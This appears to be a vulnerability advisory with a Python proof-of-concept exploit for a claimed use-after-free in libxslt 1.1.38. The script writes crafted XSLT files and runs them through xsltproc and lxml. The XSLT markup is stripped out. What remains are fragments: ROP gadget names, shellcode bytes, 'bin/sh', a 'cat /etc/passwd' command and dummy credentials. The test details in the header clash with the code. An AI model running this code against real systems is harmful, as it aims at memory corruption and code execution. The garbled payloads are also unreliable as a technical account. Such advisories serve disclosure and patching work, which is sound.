============================================================================================================================================= | # Title : libxslt Key Data Storage 1.1.38 memory corruption | | # Author : indoushka | | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.2 (64 bits) | | # Vendor : https://gitlab.gnome.org/GNOME/libxml2/-/wikis/home | ============================================================================================================================================= [+] References : https://packetstorm.news/files/id/207871/ [+] Summary : The vulnerability occurs due to improper handling of Result Value Trees (RVTs) when evaluating XSLT keys with certain XPath axes: Global variables (xsl:variable) are stored as RVTs in a linked list using prev/next pointers XSLT keys (xsl:key) using preceding:: axis traverse across RVT boundaries via these pointers Memory corruption occurs when RVTs are freed but key tables retain references to their nodes [+] Affected Version : All versions up to and including 1.1.38 [+] POC : python poc.py #!/usr/bin/env python3 # libxslt_uaf_exploit.py # استغلال ثغرة Use-After-Free في libxslt عبر Python lxml import lxml.etree as ET import sys import os import subprocess from base64 import b64encode class LibxsltUAFExploit: def __init__(self): self.xslt_content = None self.xml_content = None def create_malicious_xslt(self): """إنشاء ملف XSLT ضار لاستغلال الثغرة""" self.xslt_content = ''' admin SuperSecret@123! Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9 AKIAIOSFODNN7EXAMPLE 4111-1111-1111-1111 12/25 123 AAAAAAAA 0x7f8a1b002000 BBBBBBBB 0x7f8a1b002100 pop rdi; ret system@plt \\x31\\xc0\\x48\\xbb\\xd1\\x9d\\x96\\x91\\xd0\\x8c\\x97\\xff

''' with open('/tmp/exploit.xsl', 'w') as f: f.write(self.xslt_content) print("[+] تم إنشاء ملف XSLT الضار") def create_target_xml(self): """إنشاء ملف XML هدف""" self.xml_content = ''' Vulnerable App 1.0 Linux test_user ''' with open('/tmp/target.xml', 'w') as f: f.write(self.xml_content) print("[+] تم إنشاء ملف XML الهدف") def exploit_via_python_lxml(self): """استغلال الثغرة عبر lxml مباشرة""" print("[+] محاولة الاستغلال عبر Python lxml...") try: # تحميل وتحويل XML باستخدام XSLT xml_doc = ET.parse('/tmp/target.xml') xslt_doc = ET.parse('/tmp/exploit.xsl') transform = ET.XSLT(xslt_doc) # تنفيذ التحويل (تفعيل الثغرة) result = transform(xml_doc) print("[+] نتيجة الاستغلال:") print(str(result)) except Exception as e: print(f"[-] فشل الاستغلال عبر lxml: {e}") def exploit_via_xsltproc(self): """استغلال الثغرة عبر xsltproc""" print("[+] محاولة الاستغلال عبر xsltproc...") try: result = subprocess.run([ 'xsltproc', '/tmp/exploit.xsl', '/tmp/target.xml' ], capture_output=True, text=True, timeout=10) print("[+] stdout:") print(result.stdout) if result.stderr: print("[+] stderr (قد يحتوي على معلومات التصحيح):") print(result.stderr) except subprocess.TimeoutExpired: print("[-] انتهت مهلة التنفيذ - احتمال تحطم التطبيق") except Exception as e: print(f"[-] خطأ في التنفيذ: {e}") def check_vulnerability(self): """فحص إذا كان النظام مصاب""" print("[+] فحص إصدار libxslt...") try: # فحص إصدار lxml/libxslt import lxml print(f"[+] إصدار lxml: {lxml.__version__}") # فحص إذا كان xsltproc مثبت result = subprocess.run(['xsltproc', '--version'], capture_output=True, text=True) if 'libxslt' in result.stderr: print("[+] xsltproc مثبت:") print(result.stderr) return True else: print("[-] xsltproc غير مثبت") return False except Exception as e: print(f"[-] خطأ في الفحص: {e}") return False def advanced_exploit(self): """استغلال متقدم مع تحكم أفضل""" print("[+] بدء الاستغلال المتقدم...") # إنشاء استغلال متعدد المراحل advanced_xslt = ''' STAGE1_PAYLOAD CHUNK_A CHUNK_B STAGE2_PAYLOAD CHUNK_C CHUNK_D

TRIGGERED CONFIRMED ''' with open('/tmp/advanced_exploit.xsl', 'w') as f: f.write(advanced_xslt) try: result = subprocess.run([ 'xsltproc', '/tmp/advanced_exploit.xsl', '/tmp/target.xml' ], capture_output=True, text=True) print("[+] نتيجة الاستغلال المتقدم:") print(result.stdout) except Exception as e: print(f"[-] فشل الاستغلال المتقدم: {e}") def cleanup(self): """تنظيف الملفات المؤقتة""" try: files_to_remove = [ '/tmp/exploit.xsl', '/tmp/target.xml', '/tmp/advanced_exploit.xsl' ] for file in files_to_remove: if os.path.exists(file): os.remove(file) print("[+] تم تنظيف الملفات المؤقتة") except Exception as e: print(f"[-] خطأ في التنظيف: {e}") def main(): exploit = LibxsltUAFExploit() print("=" * 50) print("مستغلة ثغرة libxslt UAF - Python Edition") print("=" * 50) # فحص القابلية للاستغلال if not exploit.check_vulnerability(): print("[-] النظام لا يبدو مصاباً") return try: # إنشاء الملفات exploit.create_malicious_xslt() exploit.create_target_xml() # محاولات الاستغلال exploit.exploit_via_xsltproc() print("\n" + "="*30) exploit.exploit_via_python_lxml() print("\n" + "="*30) exploit.advanced_exploit() except KeyboardInterrupt: print("\n[!] تم إيقاف الاستغلال بواسطة المستخدم") except Exception as e: print(f"[-] خطأ غير متوقع: {e}") finally: # تنظيف exploit.cleanup() if __name__ == "__main__": main() ==================================== [+] 1 Setting up memory structures : ==================================== Important Data Other Data =======*****===== value1 value2 value3 data1 data2 Sensitive Information

=========******================= [+] Manipulating Memory Planning ================================

Admin123! SECRET-TOKEN-ABCD 4111111111111111

=========******================== [+] Exploiting the Use-After-Free =================================

=========******================== [+] Exploiting the code ================================= bin/sh 0x43434343 AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA BEFORE_FREE

0x58585858 system cat /etc/passwd

Greetings to :===================================================================================== jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)| ===================================================================================================

Query Builder